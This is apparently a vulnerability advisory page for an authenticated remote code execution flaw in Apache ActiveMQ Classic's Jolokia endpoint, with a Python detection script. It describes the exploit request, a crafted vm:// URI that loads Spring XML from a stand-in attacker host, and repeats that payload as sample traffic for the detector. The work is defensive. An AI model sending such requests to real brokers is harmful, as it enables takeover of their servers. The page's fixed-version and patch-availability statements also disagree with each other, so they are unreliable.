Planned Fix

CVE-2026-34197

Apache ActiveMQ Jolokia RCE (authenticated)

Summary

Apache ActiveMQ Classic exposes a Jolokia JMX-HTTP bridge at /api/jolokia/ in the web console. An authenticated attacker can use Jolokia exec operations on broker MBeans to invoke addNetworkConnector or addConnector with a crafted vm:// discovery URI, causing the broker to load remote Spring XML and execute attacker-controlled code in the broker JVM. On some 6.0.x deployments with the older web-console security flaw, the attack path can become effectively unauthenticated.

Why Planned Fix?

5/6
  • Authentication required
  • Mixed internet / internal deployment
  • No user interaction needed
  • Exploitable in default configuration
  • Public PoC available
  • High impact vulnerability

Exploitation Details

Type: RCE (Remote Code Execution)
Is exploitable with default configuration? Yes
Is authentication needed? Yes
PoC / Exploit: Yes
Impact

Execute arbitrary code on the ActiveMQ broker JVM as the broker process user.

Exploitation Requirements
  • Authentication required
Exploitation Process

The attacker first authenticates to the ActiveMQ web console, then sends a POST request to /api/jolokia/ invoking an exec operation on the broker MBean, typically addNetworkConnector(String) or addConnector(String). The payload uses a crafted discovery URI such as static:(vm://... ?brokerConfig=xbean:http://attacker/evil.xml) so the broker fetches attacker-controlled Spring XML. When the remote XML is parsed, bean initialization occurs before full validation, allowing attacker-controlled bean logic or Runtime.exec() to run on the broker JVM; success is verified by callback traffic, a spawned shell, or broker logs showing the malicious vm:// / brokerConfig path.

Detection Resources
Script Detection: 1
Scanner Detection: 1

Affected Software

Vendor: Apache Software Foundation
Product: Apache ActiveMQ Classic
Affected Versions: before 5.19.4; 6.0.0 through 6.2.2
Description

Apache ActiveMQ Classic is an open-source, Java-based message broker used to route asynchronous messages between applications over JMS and other protocols.

Deployment: Mixed (internet/internal) | Protocol: HTTP | Ports: 8161
Affected Component: Jolokia JMX-HTTP bridge in the web console, especially /api/jolokia/ exec operations on BrokerService.addNetworkConnector and addConnector.

Affected Endpoints (1):
  • /api/jolokia/
Vendor Size: Medium
Remediation
Workaround
On affected 6.0.0-6.1.1 systems, update conf/jetty.xml to require authentication for the API web context, and restrict /api/jolokia/ and port 8161 to trusted management networks. This reduces exposure but does not replace patching.

Source: activemq.apache.org
Patch: Not available

Update
Upgrade Apache ActiveMQ Classic to the fixed release line; Apache's advisory recommends 5.19.5 or 6.2.3 or later.

Source: activemq.apache.org
Threat Intelligence
EPSS Score: 5.6% (probability of exploitation in the next 30 days)
EPSS Percentile: 90% (worse than 90% of all CVEs)
CISA KEV: Not Listed
Active Exploitation: No Evidence
Threat Actors: No known threat actors

Detection Rules (2)
  • Other: POST /api/jolokia/ invoking addNetworkConnector or addConnector with brokerConfig=xbean:http or vm:// URIs
  • Other: ActiveMQ broker log entries showing vm:// transport creation followed by brokerConfig=xbean:http and remote XML fetches
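The two detection rules above can be turned into simple, testable logic. The following Python is an added example written for this page, not code from the page's source, from Apache ActiveMQ or from any scanner it references. It inspects Jolokia requests (JSON POST bodies, single or batch, and the GET path form exec/mbean/operation/argument) for exec calls to addNetworkConnector or addConnector whose arguments carry the vm:// or brokerConfig=xbean:http markers, and it scans broker log lines for a vm:// transport mention followed within a short window by a remote brokerConfig fetch. All sample requests and log lines are constructed (TEST-NET addresses, not the real ActiveMQ log format).

```python
"""Added detection example for the two rules above (constructed samples, not vendor code)."""
import json
from urllib.parse import unquote

# Broker MBean operations named in the advisory as the abused ones.
DANGEROUS_OPERATIONS = {"addNetworkConnector", "addConnector"}
# URI fragments from the page's detection rules (compared case-insensitively).
SUSPICIOUS_MARKERS = ("brokerconfig=xbean:http", "vm://")
JOLOKIA_PATH = "/api/jolokia"


def _operation_name(operation):
    # Jolokia accepts "addConnector" as well as "addConnector(java.lang.String)".
    return operation.split("(", 1)[0].strip()


def _classify_exec(mbean, operation, arguments):
    """Findings for one exec call; empty list when it is not of interest."""
    if not mbean.startswith("org.apache.activemq:"):
        return []
    op = _operation_name(operation)
    if op not in DANGEROUS_OPERATIONS:
        return []
    joined = " ".join(str(a) for a in arguments).lower()
    hits = [m for m in SUSPICIOUS_MARKERS if m in joined]
    if hits:
        return [f"exec {op} on {mbean}: suspicious URI markers {hits}"]
    # Connector changes via Jolokia are unusual in normal operation; worth review.
    return [f"exec {op} on {mbean}: review arguments"]


def inspect_jolokia_request(method, path, body=""):
    """Inspect one request to the Jolokia endpoint and return a list of findings.

    Handles the JSON POST form (single object or batch list) and the GET
    path form exec/<mbean>/<operation>/<argument>."""
    if not path.startswith(JOLOKIA_PATH):
        return []
    findings = []
    if method.upper() == "POST" and body:
        try:
            payload = json.loads(body)
        except ValueError:
            return ["unparseable JSON body sent to Jolokia endpoint"]
        for req in payload if isinstance(payload, list) else [payload]:
            if isinstance(req, dict) and req.get("type") == "exec":
                findings += _classify_exec(str(req.get("mbean", "")),
                                           str(req.get("operation", "")),
                                           req.get("arguments") or [])
    else:
        # GET form: everything after the third slash is the (possibly slash-containing) argument.
        parts = unquote(path[len(JOLOKIA_PATH):]).strip("/").split("/", 3)
        if len(parts) >= 3 and parts[0] == "exec":
            findings += _classify_exec(parts[1], parts[2], parts[3:])
    return findings


def scan_broker_log(lines, window=20):
    """Return (vm_line, fetch_line) index pairs where a vm:// transport mention is
    followed within `window` lines by a remote brokerConfig=xbean:http fetch."""
    alerts, last_vm = [], None
    for i, line in enumerate(lines):
        low = line.lower()
        if "vm://" in low:
            last_vm = i
        if "brokerconfig=xbean:http" in low and last_vm is not None and i - last_vm <= window:
            alerts.append((last_vm, i))
    return alerts


# Constructed sample traffic: a benign attribute read and an exec matching rule 1.
SAMPLE_REQUESTS = [
    ("GET", "/api/jolokia/read/org.apache.activemq:type=Broker,brokerName=localhost/TotalEnqueueCount", ""),
    ("POST", "/api/jolokia/", json.dumps({
        "type": "exec",
        "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
        "operation": "addNetworkConnector(java.lang.String)",
        "arguments": ["static:(vm://localhost?brokerConfig=xbean:http://203.0.113.10/evil.xml)"],
    })),
]

# Constructed broker log lines (not the real ActiveMQ log format) matching rule 2.
SAMPLE_BROKER_LOG = [
    "INFO  Apache ActiveMQ broker localhost started",
    "INFO  Connector vm://localhost started",
    "INFO  Loading broker configuration from brokerConfig=xbean:http://203.0.113.10/evil.xml",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req[0], req[1][:40], "->", inspect_jolokia_request(*req))
    print("log alerts:", scan_broker_log(SAMPLE_BROKER_LOG))
```

Any exec of addNetworkConnector or addConnector is reported even without the URI markers, because changing connectors through the HTTP bridge is rare enough in normal operation that it deserves review; the marker match is what distinguishes the pattern this advisory describes from an ordinary administrative change.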

NVD Data


Description Summary

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue.

CVSS Base Score: 8.8 (High)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  • Attack Vector (AV): Network
  • Attack Complexity (AC): Low
  • Privileges Required (PR): Low
  • User Interaction (UI): None
  • Scope (S): Unchanged
  • Confidentiality (C): High
  • Integrity (I): High
  • Availability (A): High
CWE: CWE-20 Improper Input Validation; CWE-94 Code Injection

Priority History

Planned Fix (initial analysis)